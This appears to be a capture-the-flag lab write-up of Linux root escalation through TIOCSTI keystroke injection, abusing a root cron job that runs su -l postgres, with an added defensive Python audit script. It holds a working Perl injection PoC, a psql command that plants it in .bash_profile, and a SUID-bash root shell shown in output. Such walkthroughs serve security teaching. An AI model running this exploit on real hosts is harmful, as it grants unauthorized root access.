TTY Hijacking


I previously identified an old vulnerability in Linux systems. It arises from the improper handling of terminals inherited by the su and sudo binaries: a child process that shares the caller's controlling terminal can inject keystrokes into it. By exploiting a root cronjob process that runs su -l postgres, I can execute arbitrary commands with the privileges of the root user. At a later stage, I was able to confirm the code execution.
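As an added defensive check (not part of the original writeup), the following Python script audits a host for the two ingredients this attack needs: a kernel that still honours TIOCSTI and a privileged su invocation that shares its caller's controlling tty. The dev.tty.legacy_tiocsti knob is the real Linux 6.2+ sysctl and setsid / sudo's Defaults use_pty are the mitigations it looks for; the crontab and sudoers contents are constructed samples, not from the target host.

```python
"""Defensive audit for the su + TIOCSTI exposure described in this writeup."""
import re
from pathlib import Path

# Linux 6.2+ exposes dev.tty.legacy_tiocsti; older kernels always honour TIOCSTI.
LEGACY_TIOCSTI = Path("/proc/sys/dev/tty/legacy_tiocsti")
# `su` invoked as a command; the word boundary keeps "sudo" and paths like /usr out.
SU_CMD = re.compile(r"(?:^|[\s;&|/])su\b")
# setsid starts a new session with no controlling tty, so open("/dev/tty") fails.
ISOLATED = re.compile(r"\bsetsid\b")

def tiocsti_allowed() -> bool:
    """True if any process able to open the tty may inject keystrokes via TIOCSTI."""
    try:
        return LEGACY_TIOCSTI.read_text().strip() != "0"
    except FileNotFoundError:
        return True  # pre-6.2 kernel: no knob, TIOCSTI is always available

def cron_command(line: str, system_crontab: bool):
    """Command part of a crontab entry; None for blank, comment or VAR= lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    nfields = 1 if line.startswith("@") else 5   # @reboot-style vs m h dom mon dow
    nfields += 1 if system_crontab else 0        # /etc/crontab adds a user column
    parts = line.split(None, nfields)
    return parts[nfields] if len(parts) > nfields else None

def risky_su_jobs(crontab_text: str, system_crontab: bool = False) -> list:
    """Cron commands that run `su` while still attached to the caller's tty."""
    return [cmd for cmd in (cron_command(ln, system_crontab) for ln in crontab_text.splitlines())
            if cmd and SU_CMD.search(cmd) and not ISOLATED.search(cmd)]

def sudo_uses_pty(sudoers_text: str) -> bool:
    """True if sudoers forces a fresh pty per command (Defaults use_pty)."""
    return any(re.match(r"^\s*Defaults\b.*\buse_pty\b", ln) and "!use_pty" not in ln
               for ln in sudoers_text.splitlines())

# Constructed sample inputs, not taken from the target host.
SAMPLE_CRON = """\
# m h dom mon dow user command
*/5 * * * * root   su -l postgres -c /opt/maint.sh
@reboot     root   setsid su -l postgres -c /opt/start.sh
0 3 * * *   root   /usr/local/bin/backup.sh
"""
SAMPLE_SUDOERS = "Defaults env_reset\nDefaults use_pty\n"

if __name__ == "__main__":
    print("kernel allows TIOCSTI:", tiocsti_allowed())
    print("su jobs sharing caller tty:", risky_su_jobs(SAMPLE_CRON, True),
          "| sudo use_pty:", sudo_uses_pty(SAMPLE_SUDOERS))
```

Run it as root against the real /etc/crontab, /etc/cron.d/* and /etc/sudoers to see which su jobs still hand their caller's terminal to the switched-to user.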

Here, I will attempt to gain a shell session as the root user.

wesley@download:/tmp$ cat pe.pl 
#!/usr/bin/perl
require "sys/ioctl.ph";
open my $tty_fh, '<', '/dev/tty' or die $!;
foreach my $c (split //, "exit\n".'echo Payload as $(cp /bin/bash /tmp/b && chmod +s /tmp/b)'.$/) {
    ioctl($tty_fh, &TIOCSTI, $c);
}

I just need to set the execution command, cp /bin/bash /tmp/b && chmod +s /tmp/b, in the PoC Perl script. This copies the /bin/bash binary to /tmp/b and sets the SUID bit on it.

wesley@download:/tmp$ /usr/lib/postgresql/12/bin/psql -h localhost -U download -W -c "COPY (SELECT 'bash -c /tmp/pe.pl') TO '/var/lib/postgresql/.bash_profile';" ; cat /var/lib/postgresql/.bash_profile
password: 
COPY 1
bash -c /tmp/pe.pl

The root cronjob process then executes the PoC script through the “Logon Script” method: su -l postgres starts a login shell, which reads the planted .bash_profile.

wesley@download:/tmp$ ll
total 1236
drwxrwxrwt 13 root     root        4096 aug 10 05:15 ./
drwxr-xr-x 19 root     root        4096 jul 19 16:06 ../
-rwsr-sr-x  1 root     root     1183448 aug 10 05:15 b*
-rw-r--r--  1 root     root         288 aug 10 04:16 out.txt
-rwxrwxrwx  1 wesley   wesley       220 aug 10 05:15 pe.pl*

A moment later, the SUID binary b appears in the /tmp directory.

wesley@download:/tmp$ /tmp/b -p
b-5.0# whoami
root
b-5.0# hostname
download
b-5.0# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.226  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:c4a1  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:c4a1  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:c4:a1  txqueuelen 1000  (Ethernet)
        RX packets 22559  bytes 5697257 (5.6 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 26626  bytes 4487071 (4.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 39139  bytes 5844332 (5.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 39139  bytes 5844332 (5.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise